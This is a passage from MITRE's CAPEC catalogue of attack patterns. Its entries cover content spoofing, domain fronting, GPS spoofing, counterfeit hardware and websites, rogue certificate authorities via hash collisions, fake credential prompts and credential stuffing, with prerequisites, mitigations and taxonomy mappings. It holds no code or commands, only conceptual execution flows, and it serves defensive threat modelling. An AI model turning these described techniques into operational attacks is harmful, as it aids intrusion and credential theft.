ParentOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	627	Counterfeit GPS Signals
PeerOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	665	Exploitation of Thunderbolt Protection Flaws
CanFollow	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	33	HTTP Request Smuggling
CanFollow	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	34	HTTP Response Splitting
CanFollow	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	105	HTTP Request Splitting
CanFollow	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	273	HTTP Response Smuggling
CanFollow	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	668	Key Negotiation of Bluetooth Attack (KNOB)
CanFollow	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	701	Browser in the Middle (BiTM)

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software, Hardware, Communications
Mechanisms of Attack	Engage in Deceptive Interactions

Prerequisites

The target must provide content but fail to adequately protect it against modification.The adversary must have the means to alter data to which they are not authorized. If the content is to be modified in transit, the adversary must be able to intercept the targeted messages.

Resources Required

If the content is to be modified in transit, the adversary requires a tool capable of intercepting the target's communication and generating/creating custom packets to impact the communications.

In some variants, the targeted content is altered so that all or some of it is redirected towards content published by the attacker (for example, images and frames in the target's web site might be modified to be loaded from a source controlled by the attacker). In these cases, the attacker requires the necessary resources to host the replacement content.

Consequences

Scope	Impact	Likelihood
Integrity	Modify Data

Related Weaknesses

CWE-ID	Weakness Name
345	Insufficient Verification of Data Authenticity

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping

Entry ID	Entry Name
1491	Defacement

Relevant to the WASC taxonomy mapping

Entry ID	Entry Name
12	Content Spoofing

Relevant to the OWASP taxonomy mapping

Entry Name
Content Spoofing

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2017-05-01 (Version 2.10)	CAPEC Content Team	The MITRE Corporation
2017-05-01 (Version 2.10)	Updated Activation_Zone, Attack_Motivation-Consequences, Attack_Prerequisites, Description Summary, Injection_Vector, Payload, Payload_Activation_Impact, Related_Weaknesses, Resources_Required, Typical_Likelihood_of_Exploit
2017-08-04 (Version 2.11)	CAPEC Content Team	The MITRE Corporation
2017-08-04 (Version 2.11)	Updated Related_Attack_Patterns
2020-07-30 (Version 3.3)	CAPEC Content Team	The MITRE Corporation
2020-07-30 (Version 3.3)	Updated Prerequisites
2020-12-17 (Version 3.4)	CAPEC Content Team	The MITRE Corporation
2020-12-17 (Version 3.4)	Updated Taxonomy_Mappings
2022-09-29 (Version 3.8)	CAPEC Content Team	The MITRE Corporation
2022-09-29 (Version 3.8)	Updated Taxonomy_Mappings

CAPEC-389: Content Spoofing Via Application API Manipulation

Attack Pattern ID: 389

Abstraction: Detailed

View customized information:

Description

Typical Severity

Low

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	384	Application API Message Manipulation via Man-in-the-Middle

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software, Communications
Mechanisms of Attack	Subvert Access Control

Prerequisites

Targeted software is utilizing application framework APIs

Resources Required

A software program that allows the use of adversary-in-the-middle communications between the client and server, such as an adversary-in-the-middle proxy.

Related Weaknesses

CWE-ID	Weakness Name
353	Missing Support for Integrity Check

References

[REF-327] Tom Stracener and Sean Barnum. "So Many Ways [...]: Exploiting Facebook and YoVille". Defcon 18. 2010.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2019-04-04 (Version 3.1)	CAPEC Content Team	The MITRE Corporation
2019-04-04 (Version 3.1)	Updated Related_Weaknesses
2019-09-30 (Version 3.2)	CAPEC Content Team	The MITRE Corporation
2019-09-30 (Version 3.2)	Updated @Abstraction
2021-06-24 (Version 3.5)	CAPEC Content Team	The MITRE Corporation
2021-06-24 (Version 3.5)	Updated Description, Resources_Required

CAPEC-481: Contradictory Destinations in Traffic Routing Schemes

Attack Pattern ID: 481

Abstraction: Standard

View customized information:

Description

Likelihood Of Attack

Medium

Typical Severity

High

Relationships

Nature	Type	ID	Name
ChildOf	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	161	Infrastructure Manipulation

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software, Communications
Mechanisms of Attack	Manipulate System Resources

Prerequisites

An adversary must be aware that their message will be routed using a CDN, and that both of the contradictory domains are served from that CDN.

If the purpose of the Domain Fronting is to hide redirected C2 traffic, the C2 server must have been created in the CDN.

Skills Required

[Level: Medium]

The adversary must have some knowledge of how messages are routed.

Consequences

Scope	Impact	Likelihood
Confidentiality	Read Data Modify Data

Mitigations

Monitor connections, checking headers in traffic for contradictory domain names, or empty domain names.

Related Weaknesses

CWE-ID	Weakness Name
923	Improper Restriction of Communication Channel to Intended Endpoints

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping

Entry ID	Entry Name
1090.004	Proxy:Domain Fronting

Content History

Submissions
Submission Date	Submitter	Organization
2019-04-04 (Version 3.1)	CAPEC Content Team	The MITRE Corporation
2019-04-04 (Version 3.1)
Modifications
Modification Date	Modifier	Organization
2019-09-30 (Version 3.2)	CAPEC Content Team	The MITRE Corporation
2019-09-30 (Version 3.2)	Updated @Abstraction
2020-07-30 (Version 3.3)	CAPEC Content Team	The MITRE Corporation
2020-07-30 (Version 3.3)	Updated Related_Attack_Patterns, Taxonomy_Mappings
2023-01-24 (Version 3.9)	CAPEC Content Team	The MITRE Corporation
2023-01-24 (Version 3.9)	Updated Related_Weaknesses

CAPEC-627: Counterfeit GPS Signals

Attack Pattern ID: 627

Abstraction: Standard

View customized information:

Description

Likelihood Of Attack

Low

Typical Severity

High

Relationships

Nature	Type	ID	Name
ChildOf	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	148	Content Spoofing
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	628	Carry-Off GPS Attack

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Hardware, Communications
Mechanisms of Attack	Engage in Deceptive Interactions

Prerequisites

The target must be relying on valid GPS signal to perform critical operations.

Skills Required

[Level: High]

The ability to spoof GPS signals is not trival.

Resources Required

Ability to create spoofed GPS signals.

Consequences

Scope	Impact	Likelihood
Integrity	Modify Data

Related Weaknesses

Communications: CWE does not currently cover Communications in the way it is presented by CAPEC. Therefore, no mapping between the two corpuses can be made at this time.

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping (see parent )

Content History

Submissions
Submission Date	Submitter	Organization
2015-11-09 (Version 2.7)	CAPEC Content Team	The MITRE Corporation
2015-11-09 (Version 2.7)
Modifications
Modification Date	Modifier	Organization
2017-05-01 (Version 2.10)	CAPEC Content Team	The MITRE Corporation
2017-05-01 (Version 2.10)	Updated Attack_Motivation-Consequences, Attack_Prerequisites, Attacker_Skills_or_Knowledge_Required, Description Summary, Related_Attack_Patterns, Resources_Required, Typical_Likelihood_of_Exploit, Typical_Severity
2019-04-04 (Version 3.1)	CAPEC Content Team	The MITRE Corporation
2019-04-04 (Version 3.1)	Updated Related_Attack_Patterns

CAPEC-520: Counterfeit Hardware Component Inserted During Product Assembly

Attack Pattern ID: 520

Abstraction: Detailed

View customized information:

Description

Likelihood Of Attack

Low

Typical Severity

High

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	444	Development Alteration

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Supply Chain
Mechanisms of Attack	Manipulate System Resources
Supply Chain Risks	Development and Production

Prerequisites

The adversary will need either physical access or be able to supply malicious hardware components to the product development facility.

Skills Required

[Level: High]

Resources to maliciously construct components used by the manufacturer.

[Level: High]

Resources to physically infiltrate manufacturer or manufacturer's supplier.

Mitigations

Hardware attacks are often difficult to detect, as inserted components can be difficult to identify or remain dormant for an extended period of time.

Acquire hardware and hardware components from trusted vendors. Additionally, determine where vendors purchase components or if any components are created/acquired via subcontractors to determine where supply chain risks may exist.

Example Instances

A manufacturer of a firewall system requires a hardware card which functions as a multi-jack ethernet card with four ethernet ports. The adversary constructs a counterfeit card that functions normally except that packets from the adversary's network are allowed to bypass firewall processing completely. Once deployed at a victim location, this allows the adversary to bypass the firewall unrestricted.

In 2018 it was discovered that Chinese spies infiltrated several U.S. government agencies and corporations as far back as 2015 by including a malicious microchip within the motherboard of servers sold by Elemental Technologies to the victims. Although these servers were assembled via a U.S. based company, the motherboards used within the servers were manufactured and maliciously altered via a Chinese subcontractor. Elemental Technologies then sold these malicious servers to various U.S. government agencies, such as the DoD and CIA, and corporations like Amazon and Apple. The malicious microchip provided adversaries with a backdoor into the system, which further allowed them to access any network that contained the exploited systems, to exfiltrate data to be sent to the Chinese government.[REF-713]

Related Weaknesses

Supply Chain: CWE does not currently cover Supply Chain in the way it is presented by CAPEC. Therefore, no mapping between the two corpuses can be made at this time.

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping

Entry ID	Entry Name
1195.003	Supply Chain Compromise: Compromise Hardware Supply Chain

References

[REF-712] Cristin Goodwin and Joram Borenstein. "Guarding against supply chain attacks—Part 2: Hardware risks". Microsoft. 2020-02-03. <https://www.microsoft.com/security/blog/2020/02/03/guarding-against-supply-chain-attacks-part-2-hardware-risks/>. URL validated: 2022-02-17.

[REF-713] Jordan Robertson and Michael Riley. "The Big Hack: How China Used a Tiny Chip to Infiltrate U.S. Companies". Bloomberg. 2018-10-04. <https://www.bloomberg.com/news/features/2018-10-04/the-big-hack-how-china-used-a-tiny-chip-to-infiltrate-america-s-top-companies>. URL validated: 2022-02-17.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2015-11-09 (Version 2.7)	CAPEC Content Team	The MITRE Corporation
2015-11-09 (Version 2.7)	Updated Related_Attack_Patterns, Typical_Likelihood_of_Exploit
2019-09-30 (Version 3.2)	CAPEC Content Team	The MITRE Corporation
2019-09-30 (Version 3.2)	Updated Related_Attack_Patterns
2021-06-24 (Version 3.5)	CAPEC Content Team	The MITRE Corporation
2021-06-24 (Version 3.5)	Updated Related_Attack_Patterns
2022-02-22 (Version 3.7)	CAPEC Content Team	The MITRE Corporation
2022-02-22 (Version 3.7)	Updated Description, Example_Instances, Mitigations, Prerequisites, References
2022-09-29 (Version 3.8)	CAPEC Content Team	The MITRE Corporation
2022-09-29 (Version 3.8)	Updated Related_Attack_Patterns, Taxonomy_Mappings

CAPEC-544: Counterfeit Organizations

Attack Pattern ID: 544

Abstraction: Detailed

View customized information:

Description

Typical Severity

High

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	194	Fake the Source of Data

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Social Engineering
Mechanisms of Attack	Engage in Deceptive Interactions

Prerequisites

None

Related Weaknesses

Social Engineering: CWE does not currently cover Social Engineering in the way it is presented by CAPEC. Therefore, no mapping between the two corpuses can be made at this time.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2019-04-04 (Version 3.1)	CAPEC Content Team	The MITRE Corporation
2019-04-04 (Version 3.1)	Updated Related_Attack_Patterns
2022-09-29 (Version 3.8)	CAPEC Content Team	The MITRE Corporation
2022-09-29 (Version 3.8)	Updated Related_Attack_Patterns

CAPEC-543: Counterfeit Websites

Attack Pattern ID: 543

Abstraction: Detailed

View customized information:

Description

Adversary creates duplicates of legitimate websites. When users visit a counterfeit site, the site can gather information or upload malware.

Typical Severity

High

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	194	Fake the Source of Data
CanFollow	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	98	Phishing
CanFollow	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	611	BitSquatting
CanFollow	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	630	TypoSquatting
CanFollow	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	631	SoundSquatting
CanFollow	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	632	Homograph Attack via Homoglyphs
CanPrecede	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	89	Pharming

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Social Engineering
Mechanisms of Attack	Engage in Deceptive Interactions

Prerequisites

None

Related Weaknesses

Social Engineering: CWE does not currently cover Social Engineering in the way it is presented by CAPEC. Therefore, no mapping between the two corpuses can be made at this time.

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping

Entry ID	Entry Name
1036.005	Masquerading: Match Legitimate Name or Location

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2017-05-01 (Version 2.10)	CAPEC Content Team	The MITRE Corporation
2017-05-01 (Version 2.10)	Updated Related_Attack_Patterns
2018-07-31 (Version 2.12)	CAPEC Content Team	The MITRE Corporation
2018-07-31 (Version 2.12)	Updated Related_Attack_Patterns
2019-04-04 (Version 3.1)	CAPEC Content Team	The MITRE Corporation
2019-04-04 (Version 3.1)	Updated Related_Attack_Patterns
2020-12-17 (Version 3.4)	CAPEC Content Team	The MITRE Corporation
2020-12-17 (Version 3.4)	Updated Related_Attack_Patterns
2022-09-29 (Version 3.8)	CAPEC Content Team	The MITRE Corporation
2022-09-29 (Version 3.8)	Updated Related_Attack_Patterns, Taxonomy_Mappings

CAPEC-177: Create files with the same name as files protected with a higher classification

Attack Pattern ID: 177

Abstraction: Detailed

View customized information:

Description

Typical Severity

Very High

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	17	Using Malicious Files

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Subvert Access Control

Prerequisites

The target application must include external files. Most non-trivial applications meet this criterion.

The target application does not verify that a located file is the one it was looking for through means other than the name. Many applications fail to perform checks of this type.

The directories the target application searches to find the included file include directories writable by the attacker which are searched before the protected directory containing the actual files. It is much less common for applications to meet this criterion, but if an attacker can manipulate the application's search path (possibly by controlling environmental variables) then they can force this criterion to be met.

Resources Required

The attacker must have sufficient access to place an arbitrarily named file somewhere early in the application's search path.

Related Weaknesses

CWE-ID	Weakness Name
706	Use of Incorrectly-Resolved Name or Reference

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping (also see parent)

Entry ID	Entry Name
1036	Masquerading

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2015-11-09 (Version 2.7)	CAPEC Content Team	The MITRE Corporation
2015-11-09 (Version 2.7)	Updated References
2018-07-31 (Version 2.12)	CAPEC Content Team	The MITRE Corporation
2018-07-31 (Version 2.12)	Updated Attack_Prerequisites, References, Related_Attack_Patterns, Related_Weaknesses

CAPEC-202: Create Malicious Client

Attack Pattern ID: 202

Abstraction: Standard

View customized information:

Description

Extended Description

For example, servers may assume that clients will accurately compute values (such as prices), will send correctly structured messages, and will attempt to ensure efficient interactions with the server. By reverse-engineering a client and creating their own version, an adversary can take advantage of these assumptions to abuse service functionality.

For example, a purchasing service might send a unit price to its client and expect the client to correctly compute the total cost of a purchase. If the adversary uses a malicious client, however, the adversary could ignore the server input and declare any total price. Likewise, an adversary could configure the client to retain network or other server resources for longer than legitimately necessary in order to degrade server performance. Even services with general clients can be susceptible to this attack if they assume certain client behaviors. However, such services generally can make fewer assumptions about the behavior of their clients in the first place and, as such, are less likely to make assumptions that an adversary can exploit.

Typical Severity

Medium

Relationships

Nature	Type	ID	Name
ChildOf	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	22	Exploiting Trust in Client

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Subvert Access Control

Prerequisites

The targeted service must make assumptions about the behavior of the client application that interacts with it, which can be abused by an adversary.

Resources Required

The adversary must be able to reverse engineer a client of the targeted service. However, the adversary does not need to reverse engineer all client functionality - they only need to recreate enough of the functionality to access the desired server functionality.

Related Weaknesses

CWE-ID	Weakness Name
602	Client-Side Enforcement of Server-Side Security

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2019-04-04 (Version 3.1)	CAPEC Content Team	The MITRE Corporation
2019-04-04 (Version 3.1)	Updated Related_Attack_Patterns
2022-02-22 (Version 3.7)	CAPEC Content Team	The MITRE Corporation
2022-02-22 (Version 3.7)	Updated Description, Extended_Description

CAPEC-459: Creating a Rogue Certification Authority Certificate

Attack Pattern ID: 459

Abstraction: Detailed

View customized information:

Description

Extended Description

Alternatively, the second certificate could be a signing certificate. Thus the adversary is able to start their own Certification Authority that is anchored in its root of trust in the legitimate Certification Authority that has signed the attacker's first X.509 certificate. If the original Certificate Authority was accepted by default by browsers, so will the Certificate Authority set up by the adversary and any certificates that it signs. As a result, the adversary is able to generate any SSL certificates to impersonate any web server, and the user's browser will not issue any warning to the victim. This can be used to compromise HTTPS communications and other types of systems where PKI and X.509 certificates may be used (e.g., VPN, IPSec).

Likelihood Of Attack

Medium

Typical Severity

Very High

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	473	Signature Spoof

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Engage in Deceptive Interactions

Execution Flow

Experiment

Craft Certificates: The adversary crafts two different, but valid X.509 certificates that when hashed with an insufficiently collision resistant hashing algorithm would yield the same value.
Send CSR to Certificate Authority: The adversary sends the CSR for one of the certificates to the Certification Authority which uses the targeted hashing algorithm. That request is completely valid and the Certificate Authority issues an X.509 certificate to the adversary which is signed with its private key.

Exploit

Insert Signed Blob into Unsigned Certificate: The adversary takes the signed blob and inserts it into the second X.509 certificate that the attacker generated. Due to the hash collision, both certificates, though different, hash to the same value and so the signed blob is valid in the second certificate. The result is two certificates that appear to be signed by a valid certificate authority despite only one having been signed.

Prerequisites

Certification Authority is using a hash function with insufficient collision resistance to generate the certificate hash to be signed

Skills Required

[Level: High]

Understanding of how to force a hash collision in X.509 certificates

[Level: High]

An attacker must be able to craft two X.509 certificates that produce the same hash value

[Level: Medium]

Knowledge needed to set up a certification authority

Resources Required

Knowledge of a certificate authority that uses hashing algorithms with poor collision resistance

A valid certificate request and a malicious certificate request with identical hash values

Consequences

Scope	Impact	Likelihood
Access Control Authentication	Gain Privileges

Mitigations

Certification Authorities need to stop using deprecated or cryptographically insecure hashing algorithms to hash the certificates that they are about to sign. Instead they should be using stronger hashing functions such as SHA-256 or SHA-512.

Example Instances

MD5 Collisions

The MD5 algorithm is not collision resistant, allowing attackers to use spoofing attacks to create rogue certificate Authorities.

CAPEC-654: Credential Prompt Impersonation

Attack Pattern ID: 654

Abstraction: Detailed

View customized information:

Description

An adversary, through a previously installed malicious application, impersonates a credential prompt in an attempt to steal a user's credentials.

Extended Description

The adversary may monitor the task list maintained by the operating system and wait for a specific legitimate credential prompt to become active. Once the prompt is detected, the adversary launches a new credential prompt in the foreground that mimics the user interface of the legitimate credential prompt. At this point, the user thinks that they are interacting with the legitimate credential prompt, but instead they are interacting with the malicious credential prompt.

A second approach involves the adversary impersonating an unexpected credential prompt, but one that may often be spawned by legitimate background processes. For example, an adversary may randomly impersonate a system credential prompt, implying that a background process or commonly used application (e.g., email reader) requires authentication for some purpose. The user, believing they are interacting with a legitimate credential prompt, enters their credentials which the adversary then leverages for nefarious purposes. The ultimate goal of this attack is to obtain sensitive information (e.g., credentials) from the user.

Likelihood Of Attack

Medium

Typical Severity

High

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	504	Task Impersonation

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Engage in Deceptive Interactions

Execution Flow

Explore

Determine suitable tasks to exploit: Determine what tasks exist on the target system that may result in a user providing their credentials.
Techniques
Determine what tasks prompt a user for their credentials.

Exploit

Impersonate Task: Impersonate a legitimate task, either expected or unexpected, in an attempt to gain user credentials.
Techniques
Prompt a user for their credentials, while making the user believe the credential request is legitimate.

Prerequisites

The adversary must already have access to the target system via some means.

A legitimate task must exist that an adversary can impersonate to glean credentials.

Skills Required

[Level: Low]

Once an adversary has gained access to the target system, impersonating a credential prompt is not difficult.

Resources Required

Malware or some other means to initially comprise the target system.

Additional malware to impersonate a legitimate credential prompt.

Indicators

Credential prompts that appear illegitimate or unexpected.

Consequences

Scope	Impact	Likelihood
Access Control Authentication	Gain Privileges

Mitigations

The only known mitigation to this attack is to avoid installing the malicious application on the device. However, to impersonate a running task the malicious application does need the GET_TASKS permission to be able to query the task list, and being suspicious of applications with that permission can help.

Example Instances

An adversary monitors the system task list for Microsoft Outlook in an attempt to determine when the application may prompt the user to enter their credentials to view encrypted email. Once the task is executed, the adversary impersonates the credential prompt to obtain the user's Microsoft Outlook encryption credentials. These credentials can then be leveraged by the adversary to read a user's encrypted email.

An adversary randomly prompts a user to enter their system credentials, tricking the user into believing that a background process requires the credentials to function. The adversary can then use these gleaned credentials to execute additional attacks or obtain data.

Related Weaknesses

CWE-ID	Weakness Name
1021	Improper Restriction of Rendered UI Layers or Frames

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping (also see parent)

Entry ID	Entry Name
1056	Input Capture
1548.004	Abuse Elevation Control Mechanism: Elevated Execution with Prompt

Content History

Submissions
Submission Date	Submitter	Organization
2020-07-30 (Version 3.3)	CAPEC Content Team	The MITRE Corporation
2020-07-30 (Version 3.3)
Modifications
Modification Date	Modifier	Organization
2022-02-22 (Version 3.7)	CAPEC Content Team	The MITRE Corporation
2022-02-22 (Version 3.7)	Updated Description, Extended_Description
2022-09-29 (Version 3.8)	CAPEC Content Team	The MITRE Corporation
2022-09-29 (Version 3.8)	Updated Taxonomy_Mappings

CAPEC-600: Credential Stuffing

Attack Pattern ID: 600

Abstraction: Standard

View customized information:

Description

Extended Description

Attacks of this kind often target management services over commonly used ports such as SSH, FTP, Telnet, LDAP, Kerberos, MySQL, and more. Additional targets include Single Sign-On (SSO) or cloud-based applications/services that utilize federated authentication protocols, and externally facing applications.

The primary goal of Credential Stuffing is to achieve lateral movement and gain authenticated access to additional systems, applications, and/or services. A successfully executed Credential Stuffing attack could result in the adversary impersonating the victim or executing any action that the victim is authorized to perform.

Although not technically a brute force attack, Credential Stuffing attacks can function as such if an adversary possess multiple known passwords for the same user account. This may occur in the event where an adversary obtains user credentials from multiple sources or if the adversary obtains a user's password history for an account.

